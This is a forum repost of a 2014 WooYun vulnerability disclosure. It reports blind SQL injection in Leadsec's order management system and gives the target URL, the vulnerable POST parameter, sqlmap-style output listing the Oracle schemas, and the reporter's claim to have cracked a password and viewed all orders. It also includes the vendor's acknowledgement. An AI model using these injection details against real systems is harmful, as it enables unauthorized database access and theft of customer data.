标题:
网御星云电子订单管理系统爆出SQL注入Oracle数据库
[打印本页]
作者:
linda
时间:
2015-1-8 15:47
标题:
网御星云电子订单管理系统爆出SQL注入Oracle数据库
漏洞概要
缺陷编号:
WooYun-2014-67456
漏洞标题: 网御星云第二集某重要业务系统爆出SQL注入Oracle数据库订单信息
相关厂商:
leadsec.com.cn
漏洞作者:
小螺号
提交时间: 2014-07-10 15:18
公开时间: 2014-10-08 15:20
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 15
漏洞状态: 厂商已经确认
漏洞来源:
http://www.wooyun.org
Tags标签:
sql注入
网御
安全厂商
没有安全意识
漏洞详情披露状态:
2014-07-10: 细节已通知厂商并且等待厂商处理中
2014-07-11: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向第三方安全合作伙伴开放
2014-07-21: 细节向核心白帽子及相关领域专家公开
2014-07-31: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-10-08: 细节向公众公开
简要描述:
网御星云--一个不安全的安全厂商
详细说明:
网御星云的电子订单管理系统,可以爆sql注入。ORACLE数据库成功列出,随便找了个用户,破了md5加密,进入订单系统,所有订单一览无余。想问问你们,这个真的不重要吗,安全厂商……………………
给你看注入点:
http://agent.leadsec.com.cn/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800
POST参数:province=11
漏洞证明:
Place: POST
Parameter: province
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: province=11。。。
...
---
[09:21:53] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
>>>>>>>>>>>>>>>>>>>DATABASES>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
CTXSYS
DBSNMP
EC_LEADSEC
EC_VENUS
EXFSYS
FLOWS_030000
FLOWS_FILES
HR
IX
MDSYS
OE
OLAPSYS
ORDSYS
OUTLN
PM
SCOTT
SH
SOAU
SPPROD
SYS
SYSMAN
SYSTEM
TSMSYS
WK_TEST
WKSYS
WMSYS
XDB
修复方案:
你们是安全厂商呀。
版权声明:转载请注明来源
小螺号
@
乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-07-11 12:04
厂商回复:
谢谢发现问题
最新状态:
暂无
原文:
http://www.wooyun.org/bugs/wooyun-2010-067456
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)
Powered by Discuz! 6.0.0